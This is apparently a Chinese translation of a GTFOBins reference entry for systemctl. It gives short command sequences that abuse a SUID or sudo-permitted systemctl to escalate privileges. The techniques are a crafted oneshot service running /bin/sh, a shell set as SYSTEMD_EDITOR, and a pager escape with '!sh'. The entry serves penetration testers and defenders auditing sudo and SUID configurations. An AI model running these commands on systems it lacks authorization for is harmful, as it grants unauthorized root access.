.. / systemctl

suid

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

• TF=$(mktemp).service
  echo '[Service]
  Type=oneshot
  ExecStart=/bin/sh -c "id > /tmp/output"
  [Install]
  WantedBy=multi-user.target' > $TF
  ./systemctl link $TF
  ./systemctl enable --now $TF
  

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

• TF=$(mktemp)
  echo /bin/sh >$TF
  chmod +x $TF
  sudo SYSTEMD_EDITOR=$TF systemctl edit system.slice
  

  TF=$(mktemp).service
  echo '[Service]
  Type=oneshot
  ExecStart=/bin/sh -c "id > /tmp/output"
  [Install]
  WantedBy=multi-user.target' > $TF
  sudo systemctl link $TF
  sudo systemctl enable --now $TF
  

  This invokes the default pager, which is likely to be [less](/gtfobins/less/), other functions may apply.

  sudo systemctl
  !sh